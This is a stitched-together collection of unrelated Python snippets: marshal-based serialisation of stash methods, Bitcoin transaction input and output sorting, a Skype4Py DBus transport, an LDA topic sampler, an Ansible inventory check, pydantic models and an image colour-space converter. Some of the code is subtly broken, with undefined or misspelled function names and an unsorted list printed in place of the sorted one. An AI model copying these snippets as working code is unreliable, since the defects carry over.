myfunc = type(fu.function.new.im_func)
## serialize the stash methods
stashed_up, stashed_fe = (getattr(st, attr).im_func.func_code for attr in ['unpack_references', 'fetch'])
res = stashed_up, stashed_fe, st.packed()
#marshal.dumps(res)
class mystash:
cons_data = {}
inst_data = {}
def fetch(self, identity, **attributes):
_, data = self.cons_data[identity]
cls, data = self.byid(_), self.unpack_references(data, **attributes)
instance = cls.u_constructor(data, **attributes)
self.fetch_cache[identity] = instance
_, data = self.inst_data[identity]
cls, data = self.byid(_), self.unpack_References(data, **attributes)
_ = cls.u_instance(instance, data, **attributes)
if instance is not _:
raise AssertionError
return instance
mystash.unpack_references = myfunc(stashed_up, namespace)
mystash.fetch = myfunc(stashed_fe, namespace)
x = mystash()
x.cons_data, x.inst_data = st.packed()
## serialize the necessary type methods
classes = [(n, fu.package.cache.byid(n)) for n in t]
methods = [(n, (cls.__name__, cls.new.im_func.func_code, cls.getclass.im_func.func_code, cls.u_constructor.im_func.func_code, cls.u_instance.im_func.func_code)) for n, cls in classes]
marshal.dumps(methods)
## ensure that we can recreate all these type methods
result, namespace = {}, {}
namespace['thread'] = importlib.import_module('thread')
namespace['imp'] = importlib.import_module('imp')
namespace['_weakref'] = importlib.import_module('_weakref')
for n, (name, new, get, cons, inst) in methods:
objspace = {
'new' : myfunc(new, namespace),
'getclass' : myfunc(get, namespace),
'u_constructor' : myfunc(cons, namespace),
'u_instance' : myfunc(inst, namespace),
}
o = type(name, (object,), objspace)()
result[n] = namespace[name] = o
#for attr in ['func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']:
#for n, (new, cons, inst) in methods:
# if any(x.func_closure is not None for x in [cons, inst]):
# raise Exception(n)
# if any(x.func_defaults is not None for x in [cons, inst]):
# raise Exception(n)
# if any(len(x.func_dict) != 0 for x in [cons, inst]):
# raise Exception(n)
# for attr in ['func_code', 'func_name']:
# print(n, attr, repr(getattr(cons, attr)))
# print(n, attr, repr(getattr(inst, attr)))
consdata = st.cons_data
instances = {}
for _, (t, v) in consdata.items():
result[t].u_constructor(v, globals=namespace)
|
from heathcliff.api import SearchAdsAPI
from heathcliff.reporting import SearchAdsReporter |
import binascii
#returns -1 if barr1 is less, 1 if barr1 is greater, and 0 if equal
def bytearr_cmp(barr1, barr2):
pos = 0
while (pos < len(barr1) and pos < len(barr2)):
if (barr1[pos] < barr2[pos]):
return -1;
elif (barr1[pos] > barr2[pos]):
return 1;
pos = pos + 1
#the shorter array will be ordered first
if (len(barr1) < len(barr2)):
return -1
elif (len(barr1) > len(barr2)):
return 1
else:
return 0
#tuples: (prev_tx_hash_byte_arr_little_endian, prev_tx_output_index)
def input_cmp(input_tuple1, input_tuple2):
#test prev_tx_hash_byte_arr_little_endian first
prev_tx_hash_cmp = bytearr_cmp(input_tuple1[0], input_tuple2[0])
if (prev_tx_hash_cmp != 0):
return prev_tx_hash_cmp
#tie-breaker: prev_tx_output_index
if (input_tuple1[1] < input_tuple2[1]):
return -1
elif (input_tuple1[1] > input_tuple2[1]):
return 1
else:
raise ValueError('Matching previous transaction hash and previous transaction output index for two disinct inputs. Invalid!')
def sort_inputs(input_tuples):
return sorted(input_tuples, cmp=input_cmp)
def print_inputs(ordered_input_tuples):
index = 0
for prev_tx_hash_byte_arr_little_endian, prev_tx_output_index in ordered_input_tuples:
prev_tx_hash_hex = binascii.hexlify(bytearray(prev_tx_hash_byte_arr_little_endian))
print("%d: %s[%d]" % (index, prev_tx_hash_hex, prev_tx_output_index))
index = index + 1
#tuples: (amount, scriptPubKey_byte_arr)
def output_cmp(output_tuple1, output_tuple2):
#test amount first
if (output_tuple1[0] < output_tuple2[0]):
return -1
elif (output_tuple1[0] > output_tuple2[0]):
return 1
#tie-breaker: scriptPubKey_byte_arr
return bytearray_cmp(output_tuple1[1], output_tuple2[1])
def sort_outputs(output_tuples):
return sorted(output_tuples, cmp=output_cmp)
def print_outputs(ordered_output_tuples):
index = 0
for amount, scriptPubKey_byte_arr in ordered_output_tuples:
scriptPubKey_hex = binascii.hexlify(bytearray(scriptPubKey_byte_arr))
print("%d:\t%d\t%s" % (index, amount, scriptPubKey_hex))
index = index + 1
def main():
#reference data: https://blockchain.info/rawtx/0a6a357e2f7796444e02638749d9611c008b253fb55f5dc88b739b230ed0c4c3
tx_0a6a_input_tuples = [
# (prev_tx_hash_byte_arr_little_endian, prev_tx_output_index)
([0x64, 0x3e, 0x5f, 0x4e, 0x66, 0x37, 0x3a, 0x57, 0x25, 0x1f, 0xb1, 0x73, 0x15, 0x1e, 0x83, 0x8c, 0xcd, 0x27, 0xd2, 0x79, 0xac, 0xa8, 0x82, 0x99, 0x7e, 0x00, 0x50, 0x16, 0xbb, 0x53, 0xd5, 0xaa], 0),
([0x28, 0xe0, 0xfd, 0xd1, 0x85, 0x54, 0x2f, 0x2c, 0x6e, 0xa1, 0x90, 0x30, 0xb0, 0x79, 0x60, 0x51, 0xe7, 0x77, 0x2b, 0x60, 0x26, 0xdd, 0x5d, 0xdc, 0xcd, 0x7a, 0x2f, 0x93, 0xb7, 0x3e, 0x6f, 0xc2], 0),
([0xf0, 0xa1, 0x30, 0xa8, 0x49, 0x12, 0xd0, 0x3c, 0x1d, 0x28, 0x49, 0x74, 0xf5, 0x63, 0xc5, 0x94, 0x9a, 0xc1, 0x3f, 0x83, 0x42, 0xb8, 0x11, 0x2e, 0xdf, 0xf5, 0x29, 0x71, 0x59, 0x9e, 0x6a, 0x45], 0),
([0x0e, 0x53, 0xec, 0x5d, 0xfb, 0x2c, 0xb8, 0xa7, 0x1f, 0xec, 0x32, 0xdc, 0x9a, 0x63, 0x4a, 0x35, 0xb7, 0xe2, 0x47, 0x99, 0x29, 0x5d, 0xdd, 0x52, 0x78, 0x21, 0x78, 0x22, 0xe0, 0xb3, 0x1f, 0x57], 0),
([0x38, 0x1d, 0xe9, 0xb9, 0xae, 0x1a, 0x94, 0xd9, 0xc1, 0x7f, 0x6a, 0x08, 0xef, 0x9d, 0x34, 0x1a, 0x5c, 0xe2, 0x9e, 0x2e, 0x60, 0xc3, 0x6a, 0x52, 0xd3, 0x33, 0xff, 0x62, 0x03, 0xe5, 0x8d, 0x5d], 1),
([0xf3, 0x20, 0x83, 0x2a, 0x9d, 0x2e, 0x24, 0x52, 0xaf, 0x63, 0x15, 0x4b, 0xc6, 0x87, 0x49, 0x34, 0x84, 0xa0, 0xe7, 0x74, 0x5e, 0xbd, 0x3a, 0xaf, 0x9c, 0xa1, 0x9e, 0xb8, 0x08, 0x34, 0xad, 0x60], 0),
([0xde, 0x04, 0x11, 0xa1, 0xe9, 0x74, 0x84, 0xa2, 0x80, 0x4f, 0xf1, 0xdb, 0xde, 0x26, 0x0a, 0xc1, 0x9d, 0xe8, 0x41, 0xbe, 0xba, 0xd1, 0x88, 0x0c, 0x78, 0x29, 0x41, 0xac, 0xa8, 0x83, 0xb4, 0xe9], 1),
([0x3b, 0x8b, 0x2f, 0x8e, 0xfc, 0xeb, 0x60, 0xba, 0x78, 0xca, 0x8b, 0xba, 0x20, 0x6a, 0x13, 0x7f, 0x14, 0xcb, 0x5e, 0xa4, 0x03, 0x5e, 0x76, 0x1e, 0xe2, 0x04, 0x30, 0x2d, 0x46, 0xb9, 0x8d, 0xe2], 0),
([0x54, 0xff, 0xff, 0x18, 0x29, 0x65, 0xed, 0x09, 0x57, 0xdb, 0xa1, 0x23, 0x9c, 0x27, 0x16, 0x4a, 0xce, 0x5a, 0x73, 0xc9, 0xb6, 0x2a, 0x66, 0x0c, 0x74, 0xb7, 0xb7, 0xf1, 0x5f, 0xf6, 0x1e, 0x7a], 1),
([0xba, 0xfd, 0x65, 0xe3, 0xc7, 0xf3, 0xf9, 0xfd, 0xfd, 0xc1, 0xdd, 0xb0, 0x26, 0x13, 0x1b, 0x27, 0x8c, 0x3b, 0xe1, 0xaf, 0x90, 0xa4, 0xa6, 0xff, 0xa7, 0x8c, 0x46, 0x58, 0xf9, 0xec, 0x0c, 0x85], 0),
([0xa5, 0xe8, 0x99, 0xdd, 0xdb, 0x28, 0x77, 0x6e, 0xa9, 0xdd, 0xac, 0x0a, 0x50, 0x23, 0x16, 0xd5, 0x3a, 0x4a, 0x3f, 0xca, 0x60, 0x7c, 0x72, 0xf6, 0x6c, 0x47, 0x0e, 0x04, 0x12, 0xe3, 0x40, 0x86], 0),
([0x7a, 0x1d, 0xe1, 0x37, 0xcb, 0xaf, 0xb5, 0xc7, 0x04, 0x05, 0x45, 0x5c, 0x49, 0xc5, 0x10, 0x4c, 0xa3, 0x05, 0x7a, 0x1f, 0x12, 0x43, 0xe6, 0x56, 0x3b, 0xb9, 0x24, 0x5c, 0x9c, 0x88, 0xc1, 0x91], 0),
([0x26, 0xaa, 0x6e, 0x6d, 0x8b, 0x9e, 0x49, 0xbb, 0x06, 0x30, 0xaa, 0xc3, 0x01, 0xdb, 0x67, 0x57, 0xc0, 0x2e, 0x36, 0x19, 0xfe, 0xb4, 0xee, 0x0e, 0xea, 0x81, 0xeb, 0x16, 0x72, 0x94, 0x70, 0x24], 1),
([0x40, 0x2b, 0x2c, 0x02, 0x41, 0x17, 0x20, 0xbf, 0x40, 0x9e, 0xff, 0x60, 0xd0, 0x5a, 0xda, 0xd6, 0x84, 0xf1, 0x35, 0x83, 0x89, 0x62, 0x82, 0x3f, 0x36, 0x14, 0xcc, 0x65, 0x7d, 0xd7, 0xbc, 0x0a], 1),
([0x7d, 0x03, 0x7c, 0xeb, 0x2e, 0xe0, 0xdc, 0x03, 0xe8, 0x2f, 0x17, 0xbe, 0x79, 0x35, 0xd2, 0x38, 0xb3, 0x5d, 0x1d, 0xea, 0xbf, 0x95, 0x3a, 0x89, 0x2a, 0x45, 0x07, 0xbf, 0xbe, 0xeb, 0x3b, 0xa4], 1),
([0x6c, 0x1d, 0x56, 0xf3, 0x1b, 0x2d, 0xe4, 0xbf, 0xc6, 0xaa, 0xea, 0x28, 0x39, 0x6b, 0x33, 0x31, 0x02, 0xb1, 0xf6, 0x00, 0xda, 0x9c, 0x6d, 0x61, 0x49, 0xe9, 0x6c, 0xa4, 0x3f, 0x11, 0x02, 0xb1], 1),
([0xb4, 0x11, 0x2b, 0x8f, 0x90, 0x0a, 0x7c, 0xa0, 0xc8, 0xb0, 0xe7, 0xc4, 0xdf, 0xad, 0x35, 0xc6, 0xbe, 0x5f, 0x6b, 0xe4, 0x6b, 0x34, 0x58, 0x97, 0x49, 0x88, 0xe1, 0xcd, 0xb2, 0xfa, 0x61, 0xb8], 0)]
tx_0a6a_sorted_input_tuples = sort_inputs(tx_0a6a_input_tuples)
print_inputs(tx_0a6a_sorted_input_tuples)
tx_0a6a_output_tuples = [
# (amount, scriptPubKey_byte_arr)
(400057456, [0x76, 0xa9, 0x14, 0x4a, 0x5f, 0xba, 0x23, 0x72, 0x13, 0xa0, 0x62, 0xf6, 0xf5, 0x79, 0x78, 0xf7, 0x96, 0x39, 0x0b, 0xdc, 0xf8, 0xd0, 0x15, 0x88, 0xac]),
(40000000000, [0x76, 0xa9, 0x14, 0x5b, 0xe3, 0x26, 0x12, 0x93, 0x0b, 0x83, 0x23, 0xad, 0xd2, 0x21, 0x2a, 0x4e, 0xc0, 0x3c, 0x15, 0x62, 0x08, 0x4f, 0x84, 0x88, 0xac])]
tx_0a6a_sorted_output_tuples = sort_outputs(tx_0a6a_output_tuples)
print_outputs(tx_0a6a_sorted_output_tuples)
#reference data: https://blockchain.info/rawtx/28204cad1d7fc1d199e8ef4fa22f182de6258a3eaafe1bbe56ebdcacd3069a5f thanks @quantabytes!
tx_2820_input_tuples = [
# (prev_tx_hash, prev_tx_output_index)
("35288d269cee1941eaebb2ea85e32b42cdb2b04284a56d8b14dcc3f5c65d6055", 0),
("35288d269cee1941eaebb2ea85e32b42cdb2b04284a56d8b14dcc3f5c65d6055", 1)] #duplicate prev_tx_hash
tx_2820_sorted_input_tuples = sort_inputs(tx_2820_input_tuples)
print_inputs(tx_2820_sorted_input_tuples)
tx_2820_output_tuples = [
# (amount, scriptPubKey_byte_arr)
(100000000, [0x41, 0x04, 0x6a, 0x07, 0x65, 0xb5, 0x86, 0x56, 0x41, 0xce, 0x08, 0xdd, 0x39, 0x69, 0x0a, 0xad, 0xe2, 0x6d, 0xfb, 0xf5, 0x51, 0x14, 0x30, 0xca, 0x42, 0x8a, 0x30, 0x89, 0x26, 0x13, 0x61, 0xce, 0xf1, 0x70, 0xe3, 0x92, 0x9a, 0x68, 0xae, 0xe3, 0xd8, 0xd4, 0x84, 0x8b, 0x0c, 0x51, 0x11, 0xb0, 0xa3, 0x7b, 0x82, 0xb8, 0x6a, 0xd5, 0x59, 0xfd, 0x2a, 0x74, 0x5b, 0x44, 0xd8, 0xe8, 0xd9, 0xdf, 0xdc, 0x0c, 0xac]),
(2400000000, [0x41, 0x04, 0x4a, 0x65, 0x6f, 0x06, 0x58, 0x71, 0xa3, 0x53, 0xf2, 0x16, 0xca, 0x26, 0xce, 0xf8, 0xdd, 0xe2, 0xf0, 0x3e, 0x8c, 0x16, 0x20, 0x2d, 0x2e, 0x8a, 0xd7, 0x69, 0xf0, 0x20, 0x32, 0xcb, 0x86, 0xa5, 0xeb, 0x5e, 0x56, 0x84, 0x2e, 0x92, 0xe1, 0x91, 0x41, 0xd6, 0x0a, 0x01, 0x92, 0x8f, 0x8d, 0xd2, 0xc8, 0x75, 0xa3, 0x90, 0xf6, 0x7c, 0x1f, 0x6c, 0x94, 0xcf, 0xc6, 0x17, 0xc0, 0xea, 0x45, 0xaf, 0xac])]
tx_2820_sorted_output_tuples = sort_outputs(tx_2820_output_tuples)
print_outputs(tx_2820_output_tuples)
if __name__ == "__main__":
main()
|
"""
Low level *Skype for Linux* interface implemented using *dbus-python* package.
This module handles the options that you can pass to `Skype.__init__`
for Linux machines when the transport is set to *DBus*. See below.
- ``RunMainLoop`` (bool) - If set to False, Skype4Py won't start the GLib main
loop. Otherwise it is started in a separate thread. The loop must be running for
Skype4Py events to work properly. Set this option to False if you plan to run the
loop yourself or if, for example, your GUI framework does it for you.
:requires: Skype for Linux 2.0 (beta) or newer.
"""
__docformat__ = 'restructuredtext en'
import sys
import threading
import time
import warnings
import logging
from Skype4Py.api import Command, SkypeAPIBase, \
timeout2float, finalize_opts
from Skype4Py.enums import *
from Skype4Py.errors import SkypeAPIError
from Skype4Py.utils import cndexp
__all__ = ['SkypeAPI']
if getattr(sys, 'skype4py_setup', False):
# we get here if we're building docs; to let the module import without
# exceptions, we emulate the dbus module using a class:
class dbus(object):
class service(object):
class Object(object):
pass
@staticmethod
def method(*args, **kwargs):
return lambda *args, **kwargs: None
else:
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
import gobject
class SkypeNotify(dbus.service.Object):
"""DBus object which exports a Notify method. This will be called by Skype for all
notifications with the notification string as a parameter. The Notify method of this
class calls in turn the callable passed to the constructor.
"""
def __init__(self, bus, notify):
dbus.service.Object.__init__(self, bus, '/com/Skype/Client')
self.notify = notify
@dbus.service.method(dbus_interface='com.Skype.API.Client')
def Notify(self, com):
self.notify(unicode(com))
class SkypeAPI(SkypeAPIBase):
def __init__(self, opts):
self.logger = logging.getLogger('Skype4Py.api.posix_dbus.SkypeAPI')
SkypeAPIBase.__init__(self)
self.run_main_loop = opts.pop('RunMainLoop', True)
finalize_opts(opts)
self.skype_in = self.skype_out = self.dbus_name_owner_watch = None
# initialize glib multithreading support
gobject.threads_init()
# dbus-python calls object.__init__() with arguments passed to SessionBus(),
# this throws a warning on newer Python versions; here we suppress it
warnings.simplefilter('ignore')
try:
self.bus = dbus.SessionBus(mainloop=DBusGMainLoop())
finally:
warnings.simplefilter('default')
if self.run_main_loop:
self.mainloop = gobject.MainLoop()
def run(self):
self.logger.info('thread started')
if self.run_main_loop:
self.mainloop.run()
self.logger.info('thread finished')
def close(self):
if self.run_main_loop:
self.mainloop.quit()
self.skype_in = self.skype_out = None
if self.dbus_name_owner_watch is not None:
self.bus.remove_signal_receiver(self.dbus_name_owner_watch)
self.dbus_name_owner_watch = None
SkypeAPIBase.close(self)
def set_friendly_name(self, friendly_name):
SkypeAPIBase.set_friendly_name(self, friendly_name)
if self.skype_out:
self.send_command(Command('NAME %s' % friendly_name))
def start_watcher(self):
# starts a signal receiver detecting Skype being closed/opened
self.dbus_name_owner_watch = self.bus.add_signal_receiver(self.dbus_name_owner_changed,
'NameOwnerChanged',
'org.freedesktop.DBus',
'org.freedesktop.DBus',
'/org/freedesktop/DBus',
arg0='com.Skype.API')
def attach(self, timeout, wait=True):
self.acquire()
try:
try:
if not self.isAlive():
self.start_watcher()
self.start()
except AssertionError:
pass
try:
self.wait = True
t = threading.Timer(timeout2float(timeout), lambda: setattr(self, 'wait', False))
if wait:
t.start()
while self.wait:
if not wait:
self.wait = False
try:
if not self.skype_out:
self.skype_out = self.bus.get_object('com.Skype.API', '/com/Skype')
if not self.skype_in:
self.skype_in = SkypeNotify(self.bus, self.notify)
except dbus.DBusException:
if not wait:
break
time.sleep(1.0)
else:
break
else:
raise SkypeAPIError('Skype attach timeout')
finally:
t.cancel()
command = Command('NAME %s' % self.friendly_name, '', True, timeout)
if self.skype_out:
self.release()
try:
self.send_command(command)
finally:
self.acquire()
if command.Reply != 'OK':
self.skype_out = None
self.set_attachment_status(apiAttachRefused)
return
self.set_attachment_status(apiAttachSuccess)
finally:
self.release()
command = Command('PROTOCOL %s' % self.protocol, Blocking=True)
self.send_command(command)
self.protocol = int(command.Reply.rsplit(None, 1)[-1])
def is_running(self):
try:
self.bus.get_object('com.Skype.API', '/com/Skype')
return True
except dbus.DBusException:
return False
def startup(self, minimized, nosplash):
# options are not supported as of Skype 1.4 Beta for Linux
if not self.is_running():
import os
if os.fork() == 0: # we're child
os.setsid()
os.execlp('skype')
def shutdown(self):
import os
from signal import SIGINT
fh = os.popen('ps -o %p --no-heading -C skype')
pid = fh.readline().strip()
fh.close()
if pid:
os.kill(int(pid), SIGINT)
self.skype_in = self.skype_out = None
def send_command(self, command):
if not self.skype_out:
self.attach(command.Timeout)
self.push_command(command)
self.notifier.sending_command(command)
cmd = u'#%d %s' % (command.Id, command.Command)
self.logger.debug('sending %s', repr(cmd))
if command.Blocking:
if self.run_main_loop:
command._event = event = threading.Event()
else:
command._loop = loop = gobject.MainLoop()
command._set = False
else:
command._timer = timer = threading.Timer(command.timeout2float(), self.pop_command, (command.Id,))
try:
result = self.skype_out.Invoke(cmd)
except dbus.DBusException, err:
raise SkypeAPIError(str(err))
if result.startswith(u'#%d ' % command.Id):
self.notify(result)
if command.Blocking:
if self.run_main_loop:
event.wait(command.timeout2float())
if not event.isSet():
raise SkypeAPIError('Skype command timeout')
elif not command._set:
gobject.timeout_add_seconds(int(command.timeout2float()), loop.quit)
loop.run()
if not command._set:
raise SkypeAPIError('Skype command timeout')
else:
timer.start()
def notify(self, cmd):
cmd = unicode(cmd)
self.logger.debug('received %s', repr(cmd))
if cmd.startswith(u'#'):
p = cmd.find(u' ')
command = self.pop_command(int(cmd[1:p]))
if command is not None:
command.Reply = cmd[p + 1:]
if command.Blocking:
if self.run_main_loop:
command._event.set()
else:
command._set = True
command._loop.quit()
else:
command._timer.cancel()
self.notifier.reply_received(command)
else:
self.notifier.notification_received(cmd[p + 1:])
else:
self.notifier.notification_received(cmd)
def dbus_name_owner_changed(self, owned, old_owner, new_owner):
self.logger.debug('received dbus name owner changed')
if new_owner == '':
self.skype_out = None
self.set_attachment_status(cndexp((new_owner == ''),
apiAttachNotAvailable,
apiAttachAvailable))
|
from BeautifulSoup import BeautifulSoup
from glob import glob
from collections import defaultdict
from math import log, exp
from random import random
import zlib
from apps.rss_feeds.models import MStory
from nltk import FreqDist
def lgammln(xx):
"""
Returns the gamma function of xx.
Gamma(z) = Integral(0,infinity) of t^(z-1)exp(-t) dt.
(Adapted from: Numerical Recipies in C.)
Usage: lgammln(xx)
Copied from stats.py by strang@nmr.mgh.harvard.edu
"""
coeff = [76.18009173, -86.50532033, 24.01409822, -1.231739516,
0.120858003e-2, -0.536382e-5]
x = xx - 1.0
tmp = x + 5.5
tmp = tmp - (x+0.5)*log(tmp)
ser = 1.0
for j in range(len(coeff)):
x = x + 1
ser = ser + coeff[j]/x
return -tmp + log(2.50662827465*ser)
def log_sum(log_a, log_b):
if log_a < log_b:
return log_b + log(1 + exp(log_a - log_b))
else:
return log_a + log(1 + exp(log_b - log_a))
def log_normalize(dist):
normalizer = reduce(log_sum, dist)
for ii in xrange(len(dist)):
dist[ii] -= normalizer
return dist
def log_sample(dist):
"""
Sample a key from a dictionary using the values as probabilities (unnormalized)
"""
cutoff = random()
dist = log_normalize(dist)
#print "Normalizer: ", normalizer
current = 0
for ii in xrange(len(dist)):
current += exp(dist[ii])
if current >= cutoff:
#print "Chose", i
return ii
assert False, "Didn't choose anything: %f %f" % (cutoff, current)
def create_data(stories, lang="english", doc_limit=-1, delimiter=""):
from nltk.tokenize.treebank import TreebankWordTokenizer
tokenizer = TreebankWordTokenizer()
from nltk.corpus import stopwords
stop = stopwords.words('english')
from string import ascii_lowercase
docs = {}
print("Found %i stories" % stories.count())
for story in stories:
text = zlib.decompress(story.story_content_z)
# text = story.story_title
text = ''.join(BeautifulSoup(text).findAll(text=True)).lower()
if delimiter:
sections = text.split(delimiter)
else:
sections = [text]
if doc_limit > 0 and len(docs) > doc_limit:
print("Passed doc limit %i" % len(docs))
break
print(story.story_title, len(sections))
for jj in xrange(len(sections)):
docs["%s-%i" % (story.story_title, jj)] = [x for x in tokenizer.tokenize(sections[jj]) \
if (not x in stop) and \
(min(y in ascii_lowercase for y in x))]
return docs
class LdaSampler:
def __init__(self, num_topics, doc_smoothing = 0.1, topic_smoothing = 0.01):
self._docs = defaultdict(FreqDist)
self._topics = defaultdict(FreqDist)
self._K = num_topics
self._state = None
self._alpha = doc_smoothing
self._lambda = topic_smoothing
def optimize_hyperparameters(self, samples=5, step = 3.0):
rawParam = [log(self._alpha), log(self._lambda)]
for ii in xrange(samples):
lp_old = self.lhood(self._alpha, self._lambda)
lp_new = log(random()) + lp_old
print("OLD: %f\tNEW: %f at (%f, %f)" % (lp_old, lp_new, self._alpha, self._lambda))
l = [x - random() * step for x in rawParam]
r = [x + step for x in rawParam]
for jj in xrange(100):
rawParamNew = [l[x] + random() * (r[x] - l[x]) for x in xrange(len(rawParam))]
trial_alpha, trial_lambda = [exp(x) for x in rawParamNew]
lp_test = self.lhood(trial_alpha, trial_lambda)
#print("TRYING: %f (need %f) at (%f, %f)" % (lp_test - lp_old, lp_new - lp_old, trial_alpha, trial_lambda))
if lp_test > lp_new:
print(jj)
self._alpha = exp(rawParamNew[0])
self._lambda = exp(rawParamNew[1])
self._alpha_sum = self._alpha * self._K
self._lambda_sum = self._lambda * self._W
rawParam = [log(self._alpha), log(self._lambda)]
break
else:
for dd in xrange(len(rawParamNew)):
if rawParamNew[dd] < rawParam[dd]:
l[dd] = rawParamNew[dd]
else:
r[dd] = rawParamNew[dd]
assert l[dd] <= rawParam[dd]
assert r[dd] >= rawParam[dd]
print("\nNew hyperparameters (%i): %f %f" % (jj, self._alpha, self._lambda))
def lhood(self, doc_smoothing, voc_smoothing):
doc_sum = doc_smoothing * self._K
voc_sum = voc_smoothing * self._W
val = 0.0
val += lgammln(doc_sum) * len(self._docs)
val -= lgammln(doc_smoothing) * self._K * len(self._docs)
for ii in self._docs:
for jj in xrange(self._K):
val += lgammln(doc_smoothing + self._docs[ii][jj])
val -= lgammln(doc_sum + self._docs[ii].N())
val += lgammln(voc_sum) * self._K
val -= lgammln(voc_smoothing) * self._W * self._K
for ii in self._topics:
for jj in self._vocab:
val += lgammln(voc_smoothing + self._topics[ii][jj])
val -= lgammln(voc_sum + self._topics[ii].N())
return val
def initialize(self, data):
"""
Data should be keyed by doc-id, values should be iterable
"""
self._alpha_sum = self._alpha * self._K
self._state = defaultdict(dict)
self._vocab = set([])
for dd in data:
for ww in xrange(len(data[dd])):
# Learn all the words we'll see
self._vocab.add(data[dd][ww])
# Initialize the state to unassigned
self._state[dd][ww] = -1
self._W = len(self._vocab)
self._lambda_sum = float(self._W) * self._lambda
self._data = data
print("Initialized vocab of size %i" % len(self._vocab))
def prob(self, doc, word, topic):
val = log(self._docs[doc][topic] + self._alpha)
# This is constant across a document, so we don't need to compute this term
# val -= log(self._docs[doc].N() + self._alpha_sum)
val += log(self._topics[topic][word] + self._lambda)
val -= log(self._topics[topic].N() + self._lambda_sum)
# print doc, word, topic, self._docs[doc][topic], self._topics[topic][word]
return val
def sample_word(self, doc, position):
word = self._data[doc][position]
old_topic = self._state[doc][position]
if old_topic != -1:
self.change_count(doc, word, old_topic, -1)
probs = [self.prob(doc, self._data[doc][position], x) for x in xrange(self._K)]
new_topic = log_sample(probs)
#print doc, word, new_topic
self.change_count(doc, word, new_topic, 1)
self._state[doc][position] = new_topic
def change_count(self, doc, word, topic, delta):
self._docs[doc].inc(topic, delta)
self._topics[topic].inc(word, delta)
def sample(self, iterations = 100, hyper_delay = 10):
assert self._state
for ii in xrange(iterations):
for dd in self._data:
for ww in xrange(len(self._data[dd])):
self.sample_word(dd, ww)
print("Iteration %i %f" % (ii, self.lhood(self._alpha, self._lambda)))
if hyper_delay >= 0 and ii % hyper_delay == 0:
self.optimize_hyperparameters()
def print_topics(self, num_words=15):
for ii in self._topics:
print("%i:%s\n" % (ii, "\t".join(self._topics[ii].keys()[:num_words])))
if __name__ == "__main__":
stories = MStory.objects(story_feed_id=199)
d = create_data(stories, doc_limit=250, delimiter="")
lda = LdaSampler(5)
lda.initialize(d)
lda.sample(50)
lda.print_topics() |
import subprocess
import argparse
from typing import Optional, Sequence
def main(argv: Optional[Sequence[str]] = None):
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*')
args = parser.parse_args(argv)
result = 0
for filename in args.filenames:
cp = subprocess.run(
['ansible-inventory','--list','-i',filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if(cp.stderr):
print(f"ansible-inventory failed on file {filename} with following output:")
print(cp.stderr.decode())
result = 1
exit(result)
if __name__ == '__main__':
exit(main())
|
# ----------------------------------------------------------------------
# DefaultPlatformItem
# ----------------------------------------------------------------------
# Copyright (C) 2007-2021 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import datetime
from typing import Optional, List
# Third-party modules
from pydantic import BaseModel
# NOC modules
from .utils import Reference
from .label import LabelItem
class DefaultPlatformItem(BaseModel):
id: str
name: str
full_name: Optional[str]
description: Optional[str]
vendor: Reference
start_of_sale: Optional[datetime.datetime]
end_of_sale: Optional[datetime.datetime]
end_of_support: Optional[datetime.datetime]
end_of_xsupport: Optional[datetime.datetime]
snmp_sysobjectid: Optional[str]
aliases: Optional[List[str]]
labels: List[LabelItem]
uuid: Optional[str]
effective_labels: List[LabelItem]
bi_id: Optional[str]
class FormPlatformItem(BaseModel):
name: str
vendor: Reference
description: Optional[str]
start_of_sale: Optional[datetime.datetime]
end_of_sale: Optional[datetime.datetime]
end_of_support: Optional[datetime.datetime]
end_of_xsupport: Optional[datetime.datetime]
snmp_sysobjectid: Optional[str]
labels: Optional[List[str]]
|
import numpy as np
import cv2
from clize import run
def convert_HSV_to_IJSV(img_arr):
height, width, depth = img_arr.shape
res = np.zeros((height, width, 4), np.uint8)
hue = img_arr[:,:,0]
sat = img_arr[:,:,1]
val = img_arr[:,:,2]
res[:,:,2] = sat
res[:,:,3] = val
y = 0
while y < height:
row = np.multiply(hue[y,:], 2)
rad_arr = np.deg2rad(row)
row_i = np.cos(rad_arr)
row_j = np.sin(rad_arr)
row_i = np.multiply(row_i, 127)
row_j = np.multiply(row_j, 127)
row_i = np.add(row_i, 127)
row_j = np.add(row_j, 127)
row_i = np.round(row_i)
row_j = np.round(row_j)
row_i = row_i.astype(np.uint8)
row_j = row_j.astype(np.uint8)
res[y,:,0] = row_i
res[y,:,1] = row_j
y += 1
return res
def convert_IJSV_to_HSV(img_arr):
height, width, depth = img_arr.shape
res = np.zeros((height, width, 3), np.uint8)
hue_i = img_arr[:,:,0]
hue_j = img_arr[:,:,1]
sat = img_arr[:,:,2]
val = img_arr[:,:,3]
res[:,:,1] = sat
res[:,:,2] = val
y = 0
while y < height:
row_i = hue_i[y,:]
row_j = hue_j[y,:]
row_i = row_i.astype(np.float64)
row_j = row_j.astype(np.float64)
row_i = np.subtract(row_i, 127)
row_j = np.subtract(row_j, 127)
hue_row = np.arctan2(row_j, row_i)
hue_row = np.rad2deg(hue_row)
hue_row = np.add(hue_row, 360)
hue_row = np.mod(hue_row, 360)
hue_row = np.divide(hue_row, 2)
hue_row = np.round(hue_row)
hue_row = hue_row.astype(np.uint8)
res[y,:,0] = hue_row
y += 1
return res
def test(fpath):
img = cv2.imread(fpath, -1)
img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
img2 = convert_HSV_to_IJSV(img)
cv2.imshow("intermediate", img2)
img3 = convert_IJSV_to_HSV(img2)
img4 = cv2.cvtColor(img3, cv2.COLOR_HSV2BGR)
cv2.imshow("converted", img4)
cv2.waitKey()
if __name__ == "__main__":
run(test)
|
#!/usr/bin/env python
"""
This scripts runs post-processing steps for Eddy covariance data coming
in one file in the format of europe-fluxdata.eu. This format is very similar
to the ICOS format (the only known difference is the unit of pressure,
which is hPa in europe-fluxdata.eu and kPa in ICOS).
The script covers the following steps:
- spike / outlier detection with mean absolute deviation filter
after Papale et al. (Biogeosci, 2006)
- ustar filtering after Papale et al. (Biogeosci, 2006)
- carbon flux partitioning with the nighttime method
of Reichstein et al. (Global Change Biolo, 2005) and
the daytime method of Lasslop et al. (Global Change Biolo, 2010)
- gap filling with marginal distribution sampling (MDS)
of Reichstein et al. (Global Change Biolo, 2005)
